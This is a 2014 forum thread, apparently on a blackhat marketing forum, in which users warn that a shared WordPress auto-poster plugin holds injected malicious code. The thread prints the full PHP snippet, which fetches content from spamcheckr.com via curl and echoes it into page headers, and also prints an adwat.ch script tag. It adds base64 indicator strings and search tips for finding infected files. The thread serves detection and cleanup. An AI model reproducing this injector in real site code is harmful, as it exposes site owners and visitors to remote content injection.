10.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

Closed
 
09-24-2014, 11:36 PM
Post: #11
RE:
Fantastic share...thenks...rep added.
09-25-2014, 03:44 AM (This post was last modified: 09-25-2014 03:45 AM by NewAccountz.)
Post: #12
RE:
This plugin contains a malicious code which redirects to youtube videos
file is here
/includes/class-wpw-auto-poster-class.php
and on line 313
you'll find that code
Code:
<?php  if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqv12_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqv12_cahesk');}}
?>
remove it and save it

the same code is in this plugin as well "Ultimate Social Deux"
09-25-2014, 07:58 AM (This post was last modified: 09-25-2014 07:59 AM by BRZ.)
Post: #13
RE:
This sucker has been injecting codes from a long time:
http://blog.sucuri.net/2014/03/unmasking...ugins.html

Thanks for identifying it!
09-25-2014, 08:25 AM
Post: #14
RE:
I'm downloading the files shared by the OP to check it further, and also compare it to other stuff shared here and on the website.
I honestly hope he is not the one who is inserting the malicious code on the themes and scripts, as with by "this sucker" I'm referring to the dumb ass who is doing it...

Anyway, per the forum rules, anyone doing it sharing malicious codes should be banned.
I do hope it is not him...
09-25-2014, 11:09 AM
Post: #15
RE:
Members be Aware!
Read it entirely...

These guys, namely Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-Vip, also from the website http://Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)/ has been sharing malicious codes within their release!
This is the way they are doing money, and releasing more and more contents here and around the web.


To keep it simple...
1. Grab yourself a copy of DreamWeaver which will help you to search for codes and contents on an entire directory;
2. Open it, and hit the CTRL+F and point it to search inside a directory path you have your source;
3. Pay attention to the following lines you'll be searching for, and hit the 'find everything' button.
4. Try to grab a copy of Beyond Compare, which lets you to compare tons of files instantly...


If you ever downloaded something from them, promptly inspect your source code for curl_init functions, obfuscated codes, and some dirty clean code as well like ones I'll mention below:

Item A:
If you have it there, drop your site and start all over. Your site is already completely screwed... I'd start all over.
And add more reps to these low life beggars! Or go find them and teach them a lesson...
Search item by item, and if you find one, you've been screwed up.
Quote:spamcheckr
http://spamcheckr.com/
"http://spamcheckr.com/l.php"

adwat
http://adwat.ch/
http://adwat.ch/js/easylink.js


Here it is the entire code:

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqv12_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,​1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqv12_cahesk');}}
?>
<?php


And some more:

<script type="text/javascript">
var adwatch_id = 234224;
var adwatch_advert = "int";
var exclude_domains = ['affiliates.playboy.com', 'elperutienetalento.com', 'skeezybabes.com', 'wp-admin', 'kamapisachi.info', 'nude', 'sex', 'porn', 'naked', 'F***', 'cock', 'penis', 'tits', 'boobs', 'pussy', 'wp-login', 'hillaryClinton2016.com', 'mpmgworld.com', 'madeforher.in'];
</script>
<script type="text/javascript" src="http://adwat.ch/js/easylink.js"></script>


Item B:
If you find the exact obfuscated codes such the one below, drop it as well and start all over: You've got screwed by them as well.
If you find other obfuscated codes such as the other examples, I'd start all over as well, but it is up to you to decide it... However, some software developers uses obfuscated codes for protecting their source codes; but in anyway, I usually don't accept using anything obfuscated myself mainly when I download it from the Internet around the forums.Search for one by one, line by line, and not all the four in these examples. If you find something on this example, you're also screwed!
Quote:c3BhbWNoZWNrci5jb20vY2hlY2sucGhw
amFxcXNjaWdzQGdtYWlsLmNvbQ==
d29yZHByZXNzc2xvZ0B5YW5kZXguY29t
NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu

Item C:
Look for functions like the ones below and inspect the URLs (links) that goes near by them. If you find some URL that might not be there, and with it I mean an "strange URL", something other than the developer URL or well know and trusted URLs, take double care and go further and try to figure out what does these addresses are pointing at. Again, if it is pointing to some unknown URL, you probably should not use it and try to get an original copy of the code to compare it, and if in your comparison it does not match, you are probably screwed as well. Search for:
Quote:curl_init
$addressd


Item D:
DO NOT BELIEVE in VirusTotal... It will not detect many of these craps all these guys are doing:
Check your self all the things prior to using it!
This is a good start.

If you found something infected or suspect, promptly report it as malicious with the following message and hitting the report button:
This nonsense has uploaded an infected item, and the OP should be permanently banned!

Also share your findings (infected items) on this threads below:
http://bestblackhatforum.com/Thread-List...d-BE-AWARE
http://bestblackhatforum.com/Thread-List...d-BE-AWARE

For simply copy and paste this entire message on other threads use these Pastebin and Pastebay:
pastebin .com/LNNHvQMQ
http://pastebay.net/1498225
52.gif
09-25-2014, 01:43 PM
Post: #16
RE:
any facebook poster script for blogger?
09-26-2014, 03:32 AM
Post: #17
RE:
I've been a friend gave plugin, I do not think that's a bad thing to you, if it's really bad. I sincerely apologize to you. but not all of my posts on this forum are bad, MajoMaslo,BRZ always say my post is not good. Such is not true. two people say the same. they are a people who do not want me to share your theme again. it was so bad.
http://bestblackhatforum.com/Thread-Ninj...ess-Plugin
http://bestblackhatforum.com/Thread-Ninj...%93-V1-6-5
Thank you.
09-26-2014, 06:26 AM
Post: #18
RE:
how to plug it with WP?
09-26-2014, 05:42 PM
Post: #19
RE:
(09-26-2014 06:26 AM)extractors Wrote:  how to plug it with WP?
What u mean????
u can use this plugin by removing those lines stated above
10-02-2014, 12:37 AM
Post: #20
RE:
Thanks, reps to you
40.gif
Closed
 




70.gif